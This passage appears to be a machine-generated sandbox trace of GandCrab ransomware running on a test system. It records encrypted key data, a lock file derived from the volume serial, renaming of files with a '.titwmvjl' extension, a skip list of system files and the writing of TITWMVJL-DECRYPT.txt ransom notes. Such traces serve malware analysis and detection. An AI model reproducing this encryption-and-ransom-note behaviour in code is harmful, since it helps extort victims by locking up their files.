64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.781] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0069.782] CloseHandle (hObject=0x2c4) returned 1 [0069.782] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.782] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.783] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x5a)) [0069.783] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.783] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.783] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.783] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a09d2ca4deb61a.lock") returned 93 [0069.783] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\nativecache\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0069.785] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.785] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.785] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\") returned 69 [0069.785] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0069.785] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503338 [0069.785] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.785] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.785] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.785] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.786] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.786] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.786] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.786] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a09d2ca4deb61a.lock" [0069.786] lstrlenW (lpString=".titwmvjl") returned 9 [0069.786] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a09d2ca4deb61a.lock") returned 93 [0069.786] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.786] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 102 [0069.786] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a09d2ca4deb61a.lock") returned 93 [0069.786] lstrlenW (lpString=".lock") returned 5 [0069.786] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.786] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.786] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.786] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.786] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.786] lstrcmpW (lpString1="NativeCache.directory", lpString2=".") returned 1 [0069.786] lstrcmpW (lpString1="NativeCache.directory", lpString2="..") returned 1 [0069.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="NativeCache.directory" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory" [0069.787] lstrlenW (lpString=".titwmvjl") returned 9 [0069.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned 90 [0069.787] VirtualAlloc (lpAddress=0x0, dwSize=0xf4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.787] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory.titwmvjl") returned 99 [0069.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned 90 [0069.787] lstrlenW (lpString=".directory") returned 10 [0069.787] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.787] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".directory ") returned 11 [0069.787] lstrcmpiW (lpString1=".directory", lpString2=".titwmvjl") returned -1 [0069.787] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned 90 [0069.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned 90 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="desktop.ini") returned 1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="autorun.inf") returned 1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ntuser.dat") returned -1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="iconcache.db") returned 1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="bootsect.bak") returned 1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="boot.ini") returned 1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ntuser.dat.log") returned -1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="thumbs.db") returned -1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.787] lstrcmpiW (lpString1="NativeCache.directory", lpString2="KRAB-DECRYPT.html") returned 1 [0069.788] lstrcmpiW (lpString1="NativeCache.directory", lpString2="CRAB-DECRYPT.html") returned 1 [0069.788] lstrcmpiW (lpString1="NativeCache.directory", lpString2="KRAB-DECRYPT.txt") returned 1 [0069.788] lstrcmpiW (lpString1="NativeCache.directory", lpString2="CRAB-DECRYPT.txt") returned 1 [0069.788] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ntldr") returned -1 [0069.788] lstrcmpiW (lpString1="NativeCache.directory", lpString2="NTDETECT.COM") returned -1 [0069.788] lstrcmpiW (lpString1="NativeCache.directory", lpString2="Bootfont.bin") returned 1 [0069.788] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.788] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.788] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.788] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.788] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\TITWMVJL-DECRYPT.txt" [0069.788] lstrlenW (lpString=".titwmvjl") returned 9 [0069.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\TITWMVJL-DECRYPT.txt") returned 89 [0069.788] VirtualAlloc (lpAddress=0x0, dwSize=0xf2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.788] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 98 [0069.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\TITWMVJL-DECRYPT.txt") returned 89 [0069.788] lstrlenW (lpString=".txt") returned 4 [0069.788] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.788] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.788] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.788] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\TITWMVJL-DECRYPT.txt") returned 89 [0069.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\TITWMVJL-DECRYPT.txt") returned 89 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.789] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.789] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0069.789] FindClose (in: hFindFile=0x503338 | out: hFindFile=0x503338) returned 1 [0069.790] CloseHandle (hObject=0x2c4) returned 1 [0069.790] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.790] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.790] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.790] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\TITWMVJL-DECRYPT.txt" [0069.790] lstrlenW (lpString=".titwmvjl") returned 9 [0069.790] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 77 [0069.790] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.790] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 86 [0069.790] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 77 [0069.790] lstrlenW (lpString=".txt") returned 4 [0069.790] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.790] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.790] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.791] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 77 [0069.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 77 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.791] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.791] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.791] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0069.791] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0069.792] CloseHandle (hObject=0x2bc) returned 1 [0069.792] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.792] lstrcmpW (lpString1="Headlights", lpString2=".") returned 1 [0069.792] lstrcmpW (lpString1="Headlights", lpString2="..") returned 1 [0069.792] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Headlights" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights" [0069.792] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\" [0069.792] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.793] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.793] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.793] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.793] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.793] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.793] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.794] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\\\TITWMVJL-DECRYPT.txt") returned 76 [0069.794] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\headlights\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0069.794] lstrlenW 